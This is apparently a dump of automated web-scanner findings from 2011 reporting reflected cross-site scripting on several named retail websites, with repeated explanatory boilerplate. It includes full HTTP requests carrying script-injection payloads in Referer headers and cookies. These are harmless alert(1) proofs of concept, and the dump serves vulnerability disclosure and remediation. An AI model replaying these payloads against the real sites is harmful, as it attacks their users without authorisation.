Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1
Host: www.abesofmaine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=2a067<script>alert(1)</script>fd0070ec4fa
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 1df85<script>alert(1)</script>77b71b79bed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 34631<script>alert(1)</script>53c335fa723 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /accountMenu.do HTTP/1.1
Host: www.abesofmaine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=34631<script>alert(1)</script>53c335fa723
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 980a6"><script>alert(1)</script>dc697fbf2db was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=980a6"><script>alert(1)</script>dc697fbf2db
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:04:12 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 110243
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ff80"><script>alert(1)</script>0470a887578 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /home/index.jsp HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=6ff80"><script>alert(1)</script>0470a887578
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:04:14 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 110243
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68105"><script>alert(1)</script>fb9faf167fd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:08:12 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 110213
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 424af"><script>alert(1)</script>485c49130d0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:08:06 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 110213
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3955f"><script>alert(1)</script>7aa3a316c02 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /acerewards/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3955f"><script>alert(1)</script>7aa3a316c02
Response
HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:50:40 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 81511
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a28b"><script>alert(1)</script>7c72546d38e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=7a28b"><script>alert(1)</script>7c72546d38e
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16387"><script>alert(1)</script>294dce3789b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /home/index.jsp HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=16387"><script>alert(1)</script>294dce3789b
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the Referer HTTP header is copied into an HTML comment. The payload aac6f--><script>alert(1)</script>e175c626cd6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET / HTTP/1.1
Host: www.pacificgeek.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=aac6f--><script>alert(1)</script>e175c626cd6
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 30 Sep 2011 13:30:52 GMT
X-Powered-By: ASP.NET
Content-Length: 83898
Content-Type: text/html
Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into an HTML comment. The payload 1e58b--><script>alert(1)</script>8dfeb600483 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 30 Sep 2011 13:43:54 GMT
X-Powered-By: ASP.NET
Content-Length: 79264
Content-Type: text/html
Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 41e8a<script>alert(1)</script>f52776f8ebc was submitted in the __stid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Fri, 30 Sep 2011 12:03:08 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1376
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-type" content="text/html;charset=UTF-8">
The value of the ResonanceSegment cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8b1aa(a)f737fdc7eba was submitted in the ResonanceSegment cookie. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 90215357_clogin cookie is copied into an HTML comment. The payload f02e5--><img%20src%3da%20onerror%3dalert(1)>8fc7fd52c57 was submitted in the 90215357_clogin cookie. This input was echoed as f02e5--><img src=a onerror=alert(1)>8fc7fd52c57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the Cart cookie is copied into an HTML comment. The payload ff285--><img%20src%3da%20onerror%3dalert(1)>0832286a0ca was submitted in the Cart cookie. This input was echoed as ff285--><img src=a onerror=alert(1)>0832286a0ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the CartId cookie is copied into an HTML comment. The payload d2bce--><img%20src%3da%20onerror%3dalert(1)>7b065e5aadc was submitted in the CartId cookie. This input was echoed as d2bce--><img src=a onerror=alert(1)>7b065e5aadc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the CartSave cookie is copied into an HTML comment. The payload 92569--><img%20src%3da%20onerror%3dalert(1)>2ebad211352 was submitted in the CartSave cookie. This input was echoed as 92569--><img src=a onerror=alert(1)>2ebad211352 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the CoreAt cookie is copied into an HTML comment. The payload e5754--><img%20src%3da%20onerror%3dalert(1)>1cee4e52eea was submitted in the CoreAt cookie. This input was echoed as e5754--><img src=a onerror=alert(1)>1cee4e52eea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the CoreID6 cookie is copied into an HTML comment. The payload e1eff--><img%20src%3da%20onerror%3dalert(1)>25de8accf0e was submitted in the CoreID6 cookie. This input was echoed as e1eff--><img src=a onerror=alert(1)>25de8accf0e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the DB cookie is copied into an HTML comment. The payload 580a1--><img%20src%3da%20onerror%3dalert(1)>3085a46cf9b was submitted in the DB cookie. This input was echoed as 580a1--><img src=a onerror=alert(1)>3085a46cf9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the SessionId cookie is copied into an HTML comment. The payload 90d2c--><img%20src%3da%20onerror%3dalert(1)>9043f721429 was submitted in the SessionId cookie. This input was echoed as 90d2c--><img src=a onerror=alert(1)>9043f721429 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the 90215357_clogin cookie is copied into an HTML comment. The payload 1522b--><img%20src%3da%20onerror%3dalert(1)>db83e617a5d was submitted in the 90215357_clogin cookie. This input was echoed as 1522b--><img src=a onerror=alert(1)>db83e617a5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the Cart cookie is copied into an HTML comment. The payload e8400--><img%20src%3da%20onerror%3dalert(1)>388bbaf6467 was submitted in the Cart cookie. This input was echoed as e8400--><img src=a onerror=alert(1)>388bbaf6467 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the CoreAt cookie is copied into an HTML comment. The payload 8693a--><img%20src%3da%20onerror%3dalert(1)>4f098fcc7c7 was submitted in the CoreAt cookie. This input was echoed as 8693a--><img src=a onerror=alert(1)>4f098fcc7c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the CoreID6 cookie is copied into an HTML comment. The payload 6cf8c--><img%20src%3da%20onerror%3dalert(1)>a54e117ae86 was submitted in the CoreID6 cookie. This input was echoed as 6cf8c--><img src=a onerror=alert(1)>a54e117ae86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the DB cookie is copied into an HTML comment. The payload 72f62--><img%20src%3da%20onerror%3dalert(1)>423e7fc100a was submitted in the DB cookie. This input was echoed as 72f62--><img src=a onerror=alert(1)>423e7fc100a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the SessionId cookie is copied into an HTML comment. The payload 78edc--><img%20src%3da%20onerror%3dalert(1)>5fa9cd9afa6 was submitted in the SessionId cookie. This input was echoed as 78edc--><img src=a onerror=alert(1)>5fa9cd9afa6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the Cart cookie is copied into an HTML comment. The payload 531a8--><img%20src%3da%20onerror%3dalert(1)>5c3e9baaabe was submitted in the Cart cookie. This input was echoed as 531a8--><img src=a onerror=alert(1)>5c3e9baaabe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the DB cookie is copied into an HTML comment. The payload cab00--><img%20src%3da%20onerror%3dalert(1)>1edab8d440b was submitted in the DB cookie. This input was echoed as cab00--><img src=a onerror=alert(1)>1edab8d440b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
